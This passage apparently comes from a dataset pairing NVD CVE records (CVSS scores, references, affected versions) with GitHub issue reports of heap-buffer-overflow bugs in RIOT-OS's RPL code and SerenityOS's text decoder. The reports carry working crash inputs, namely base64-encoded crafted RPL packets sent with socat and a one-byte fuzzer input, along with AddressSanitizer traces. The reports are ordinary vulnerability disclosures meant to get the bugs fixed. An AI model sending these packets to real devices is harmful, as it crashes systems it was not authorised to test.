bottom 0x5665b000; size: 0xa9781000 (-1451749376) False positive error reports may follow For details see https://github.com/google/sanitizers/issues/189 RPL: GNRC_NETAPI_MSG_TYPE_RCV received RPL: DAO received ================================================================= ==12092==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf4e00635 at pc 0x565fa023 bp 0x5666bc38 sp 0x5666bc2c READ of size 1 at 0xf4e00635 thread T0 #0 0x565fa022 in gnrc_rpl_validation_DAO /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c:116 #1 0x56602fdf in gnrc_rpl_recv_DAO /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c:1153 #2 0x565f6698 in _receive /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl.c:190 #3 0x565f725a in _event_loop /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl.c:312 #4 0xf772353a in makecontext (/lib/i386-linux-gnu/libc.so.6+0x4153a) 0xf4e00635 is located 0 bytes to the right of 5-byte region [0xf4e00630,0xf4e00635) allocated by thread T0 here: #0 0xf7ab75d4 in __interceptor_malloc (/lib32/libasan.so.5+0xeb5d4) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c:116 in gnrc_rpl_validation_DAO Shadow bytes around the buggy address: 0x3e9c0070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e9c0080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e9c0090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e9c00a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e9c00b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3e9c00c0: fa fa fa fa fa fa[05]fa fa fa fd fd fa fa fd fd 0x3e9c00d0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd 0x3e9c00e0: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa 0x3e9c00f0: fa fa fd fa fa fa fd fa fa fa fa fa fa fa fa fa 0x3e9c0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e9c0110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==12092==ABORTING ```
gnrc_rpl: Lack of bounds check for packed structs
https://api.github.com/repos/RIOT-OS/RIOT/issues/16018/comments
0
2021-02-16T09:16:42Z
2021-02-18T22:45:57Z
https://github.com/RIOT-OS/RIOT/issues/16018
809,128,176
16,018
1,792
CVE-2021-27697
2021-04-06T13:15:14.327
RIOT-OS 2021.01 contains a buffer overflow vulnerability in sys/net/gnrc/routing/rpl/gnrc_rpl_validation.c through the gnrc_rpl_validation_options() function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/16062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/16062" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:riot-os:riot:2021.01:*:*:*:*:*:*:*", "matchCriteriaId": "8F041205-8394-4EA3-BC9A-CFA9690634F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/RIOT-OS/RIOT/issues/16062
[ "Third Party Advisory" ]
github.com
[ "RIOT-OS", "RIOT" ]
#### Description The `gnrc_rpl_validation_options` function has a problem very similar to the one described in #16018: It casts packed structs without performing a prior bounds check. For example, consider the handler for `GNRC_RPL_OPT_PAD1`: https://github.com/RIOT-OS/RIOT/blob/922e2ac1c9046d0bd6ef46c3ce50766751550f17/sys/net/gnrc/routing/rpl/gnrc_rpl_validation.c#L37-L40 This is missing a check ala.: ```C if (len < sizeof(gnrc_rpl_opt_t)) return false; ``` Otherwise, reading `opt->length` (or `opt->type` on the next iteration) may result in an out-of-bounds read: https://github.com/RIOT-OS/RIOT/blob/922e2ac1c9046d0bd6ef46c3ce50766751550f17/sys/net/gnrc/routing/rpl/gnrc_rpl_validation.c#L103 #### Steps to reproduce the issue Use `examples/gnrc_networking`, activate `gnrc_pktbuf_malloc` and set `CONFIG_GNRC_RPL_DEFAULT_NETIF` to your netif (check with `ifconfig` in the shell provided by `gnrc_networking`) mine is `6`: ```diff diff --git a/examples/gnrc_networking/Makefile b/examples/gnrc_networking/Makefile index bf76931305..15132894c1 100644 --- a/examples/gnrc_networking/Makefile +++ b/examples/gnrc_networking/Makefile @@ -31,6 +31,9 @@ USEMODULE += netstats_l2 USEMODULE += netstats_ipv6 USEMODULE += netstats_rpl +USEMODULE += gnrc_pktbuf_malloc +CFLAGS += -DCONFIG_GNRC_RPL_DEFAULT_NETIF=6 + # Optionally include DNS support. This includes resolution of names at an # upstream DNS server and the handling of RDNSS options in Router Advertisements # to auto-configure that upstream DNS server. ``` Compile and run the application using: ``` $ make -C examples/gnrc_networking all-asan $ make -C examples/gnrc_networking term ``` Afterwards run `socat` as: ``` # printf 'mwEIQQIMFLsAu4lCkEOUY4EgSlBCrqi7YEKAMwAC' | base64 -d | socat -u STDIN IP6-SENDTO:[<LL address>%tap0]:58 ``` #### Expected results The application shouldn't crash. #### Actual results ``` ================================================================= ==8073==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf510050e at pc 0x56656dab bp 0x566bb748 sp 0x566bb73c READ of size 1 at 0xf510050e thread T0 #0 0x56656daa in gnrc_rpl_validation_options /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl_validation.c:99 #1 0x5664c03f in _parse_options /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c:511 #2 0x5664efe1 in gnrc_rpl_recv_DIO /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c:786 #3 0x566456d4 in _receive /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl.c:185 #4 0x566463b4 in _event_loop /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl.c:312 #5 0xf768f53a in makecontext (/lib/i386-linux-gnu/libc.so.6+0x4153a) 0xf510050e is located 0 bytes to the right of 30-byte region [0xf51004f0,0xf510050e) allocated by thread T0 here: #0 0xf7a235d4 in __interceptor_malloc (/lib32/libasan.so.5+0xeb5d4) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl_validation.c:99 in gnrc_rpl_validation_options Shadow bytes around the buggy address: 0x3ea20050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ea20060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ea20070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ea20080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ea20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00 00 =>0x3ea200a0: 00[06]fa fa 00 00 04 fa fa fa 00 00 04 fa fa fa 0x3ea200b0: 00 00 04 fa fa fa fd fd fd fa fa fa 00 00 04 fa 0x3ea200c0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x3ea200d0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x3ea200e0: fd fd fd fa fa fa fd fd fd fd fa fa fd fd fd fa 0x3ea200f0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==8073==ABORTING make: *** [/root/RIOT/examples/gnrc_networking/../../Makefile.include:729: term] Error 1 make: Leaving directory '/root/RIOT/examples/gnrc_networking' ``` CC: @cgundogan
gnrc_rpl: missing bounds checks in gnrc_rpl_validation_options
https://api.github.com/repos/RIOT-OS/RIOT/issues/16062/comments
0
2021-02-22T13:54:17Z
2021-02-24T11:38:46Z
https://github.com/RIOT-OS/RIOT/issues/16062
813,523,126
16,062
1,793
CVE-2021-27698
2021-04-06T13:15:14.387
RIOT-OS 2021.01 contains a buffer overflow vulnerability in /sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c through the _parse_options() function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/16085" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/16085" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:riot-os:riot:2021.01:*:*:*:*:*:*:*", "matchCriteriaId": "8F041205-8394-4EA3-BC9A-CFA9690634F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/RIOT-OS/RIOT/issues/16085
[ "Third Party Advisory" ]
github.com
[ "RIOT-OS", "RIOT" ]
#### Description The implementation of `_parse_options` in `gnrc_rpl` has a problem very similar to the one described in #16062: It casts packed structs without performing prior boundary checks. I think the loop code is in fact more or less a copy of the one in `gnrc_rpl_validation_options`, thus a fix very similar to #16081 will be needed for it too. Consider for example the following code: https://github.com/RIOT-OS/RIOT/blob/896e44cf931132801c1c6b18a3194ac44504dd24/sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c#L619 In this case it might be the case that `len < sizeof(gnrc_rpl_opt_target_t)`, however this case is not covered by the implementation currently. There are also other casts to packed structs in this function which have the same issue. #### Steps to reproduce the issue Use `examples/gnrc_networking`, activate `gnrc_pktbuf_malloc` and set `CONFIG_GNRC_RPL_DEFAULT_NETIF` to your netif (check with `ifconfig` in the shell provided by `gnrc_networking`) mine is `6`: ```diff diff --git a/examples/gnrc_networking/Makefile b/examples/gnrc_networking/Makefile index bf76931305..15132894c1 100644 --- a/examples/gnrc_networking/Makefile +++ b/examples/gnrc_networking/Makefile @@ -31,6 +31,9 @@ USEMODULE += netstats_l2 USEMODULE += netstats_ipv6 USEMODULE += netstats_rpl +USEMODULE += gnrc_pktbuf_malloc +CFLAGS += -DCONFIG_GNRC_RPL_DEFAULT_NETIF=6 + # Optionally include DNS support. This includes resolution of names at an # upstream DNS server and the handling of RDNSS options in Router Advertisements # to auto-configure that upstream DNS server. ``` I was also a bit too lazy to figure out how I can add an ULA to a `BOARD=native` network interface, to work around that I just made sure that `gnrc_rpl` uses the first available networking interface for DODAGs with the following patch (if you know how to configure a non-local address on a `BOARD=native` network interface please let me know): ```diff diff --git a/sys/net/gnrc/routing/rpl/gnrc_rpl_dodag.c b/sys/net/gnrc/routing/rpl/gnrc_rpl_dodag.c index 8b5e389c41..5f889c16eb 100644 --- a/sys/net/gnrc/routing/rpl/gnrc_rpl_dodag.c +++ b/sys/net/gnrc/routing/rpl/gnrc_rpl_dodag.c @@ -388,7 +388,7 @@ gnrc_rpl_instance_t *gnrc_rpl_root_instance_init(uint8_t instance_id, ipv6_addr_ return NULL; } - if ((netif = gnrc_netif_get_by_ipv6_addr(dodag_id)) == NULL) { + if ((netif = gnrc_netif_iter(NULL)) == NULL) { DEBUG("RPL: no IPv6 address configured to match the given dodag id: %s\n", ipv6_addr_to_str(addr_str, dodag_id, sizeof(addr_str))); return NULL ``` **Note:** If you don't want to apply this patch, it should also be possible to reproduce this issue by adding a non-local IPv6 address to your network interface and passing that address to the `rpl root` command below. Compile and run the application using: ``` $ make -C examples/gnrc_networking all-asan $ make -C examples/gnrc_networking term ``` In the RIOT term initialize the RPL root instance with the following command (the address passed to `rpl root` doesn't matter due to the patch from above): ``` > rpl root 0 fd12:3456:789a:1::1 ``` Afterwards run `socat` as: ``` # printf 'mwIAJwCmCwIFCQNzAT0AXgFWAQ==' | base64 -d | socat -u STDIN IP6-SENDTO:[<LL address>%tap0]:58 ``` #### Expected results The application shouldn't crash. #### Actual results ``` ================================================================= ==30751==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5100173 at pc 0xf7a14f44 bp 0x5662e818 sp 0x5662e3f0 READ of size 16 at 0xf5100173 thread T0 #0 0xf7a14f43 (/lib32/libasan.so.5+0xb9f43) #1 0x565a5a98 in ipv6_addr_is_unspecified /root/RIOT/sys/include/net/ipv6/addr.h:324 #2 0x565a610a in gnrc_ipv6_nib_ft_del /root/RIOT/sys/net/gnrc/network_layer/ipv6/nib/nib_ft.c:90 #3 0x565c3696 in _parse_options /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c:628 #4 0x565c6ff2 in gnrc_rpl_recv_DAO /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c:1196 #5 0x565bc7f2 in _receive /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl.c:190 #6 0x565bd3b4 in _event_loop /root/RIOT/sys/net/gnrc/routing/rpl/gnrc_rpl.c:312 #7 0xf76b253a in makecontext (/lib/i386-linux-gnu/libc.so.6+0x4153a) 0xf5100173 is located 0 bytes to the right of 19-byte region [0xf5100160,0xf5100173) allocated by thread T0 here: #0 0xf7a465d4 in __interceptor_malloc (/lib32/libasan.so.5+0xeb5d4) SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib32/libasan.so.5+0xb9f43) Shadow bytes around the buggy address: 0x3ea1ffd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ea1ffe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ea1fff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ea20000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ea20010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3ea20020: fa fa fa fa fa fa fa fa fa fa fa fa 00 00[03]fa 0x3ea20030: fa fa 00 00 04 fa fa fa 00 00 04 fa fa fa 00 00 0x3ea20040: 04 fa fa fa fd fd fd fa fa fa 00 00 04 fa fa fa 0x3ea20050: 00 00 00 00 fa fa 00 00 04 fa fa fa fd fd fd fa 0x3ea20060: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x3ea20070: fd fa fa fa fd fd fd fa fa fa 00 00 00 00 fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==30751==ABORTING make: *** [/root/RIOT/examples/gnrc_networking/../../Makefile.include:729: term] Error 1 make: Leaving directory '/root/RIOT/examples/gnrc_networking' ``` CC: @cgundogan
gnrc_rpl: missing bounds checks in _parse_options
https://api.github.com/repos/RIOT-OS/RIOT/issues/16085/comments
4
2021-02-24T12:39:46Z
2021-07-15T10:29:26Z
https://github.com/RIOT-OS/RIOT/issues/16085
815,440,465
16,085
1,794
CVE-2021-28874
2021-04-06T13:15:14.497
SerenityOS fixed as of c9f25bca048443e317f1994ba9b106f2386688c3 contains a buffer overflow vulnerability in LibTextCode through opening a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/commit/c9f25bca048443e317f1994ba9b106f2386688c3" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/5769" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5802" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/commit/c9f25bca048443e317f1994ba9b106f2386688c3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/5769" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5802" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:serenityos:serenityos:*:*:*:*:*:*:*:*", "matchCriteriaId": "D50BE009-07D7-434A-910A-7C41C38974CD", "versionEndExcluding": "2021-03-15", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/SerenityOS/serenity/issues/5769
[ "Third Party Advisory" ]
github.com
[ "SerenityOS", "serenity" ]
With just one byte: 0xa Trace: ``` ================================================================= ==35012==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000f1 at pc 0x000000568e44 bp 0x7ffd23defd30 sp 0x7ffd23defd28 READ of size 1 at 0x6020000000f1 thread T0 #0 0x568e43 in TextCodec::UTF16BEDecoder::to_utf8(AK::StringView const&) /home/lukew/Desktop/serenity-project/serenity/build/../Userland/Libraries/LibTextCodec/Decoder.cpp:187:44 #1 0x55d55b in LLVMFuzzerTestOneInput /home/lukew/Desktop/serenity-project/serenity/build/../Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder.cpp:36:14 #2 0x4656f1 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x4656f1) #3 0x464e35 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool*) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x464e35) #4 0x467611 in fuzzer::Fuzzer::ReadAndExecuteSeedCorpora(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x467611) #5 0x467ab9 in fuzzer::Fuzzer::Loop(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x467ab9) #6 0x45678e in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x45678e) #7 0x47f5d2 in main (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x47f5d2) #8 0x7f050ac3e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #9 0x42b52d in _start (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x42b52d) 0x6020000000f1 is located 0 bytes to the right of 1-byte region [0x6020000000f0,0x6020000000f1) allocated by thread T0 here: #0 0x52b25d in malloc (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x52b25d) #1 0x43f917 in operator new(unsigned long) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x43f917) #2 0x464e35 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool*) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x464e35) #3 0x467611 in fuzzer::Fuzzer::ReadAndExecuteSeedCorpora(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x467611) #4 0x467ab9 in fuzzer::Fuzzer::Loop(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x467ab9) #5 0x45678e in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x45678e) #6 0x47f5d2 in main (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzUTF16BEDecoder+0x47f5d2) #7 0x7f050ac3e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lukew/Desktop/serenity-project/serenity/build/../Userland/Libraries/LibTextCodec/Decoder.cpp:187:44 in TextCodec::UTF16BEDecoder::to_utf8(AK::StringView const&) Shadow bytes around the buggy address: 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 fa =>0x0c047fff8010: fa fa fd fa fa fa 00 fa fa fa 01 fa fa fa[01]fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==35012==ABORTING MS: 0 ; base unit: 0000000000000000000000000000000000000000 0xa, \x0a artifact_prefix='./'; Test unit written to ./crash-adc83b19e793491b1c6ea0fd8b46cd9f32e592fc Base64: Cg== ```
LibTextCodec: Heap buffer overflow in UTF16-BE decoder
https://api.github.com/repos/SerenityOS/serenity/issues/5769/comments
0
2021-03-13T22:58:23Z
2021-03-15T15:08:12Z
https://github.com/SerenityOS/serenity/issues/5769
831,016,848
5,769
1,795
CVE-2021-30045
2021-04-06T13:15:14.543
SerenityOS 2021-03-27 contains a buffer overflow vulnerability in the EndOfCentralDirectory::read() function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/commit/4317db7498eaa5a37068052bb0310fbc6a5f78e4" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/5975" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5977" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/commit/4317db7498eaa5a37068052bb0310fbc6a5f78e4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/5975" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5977" } ]
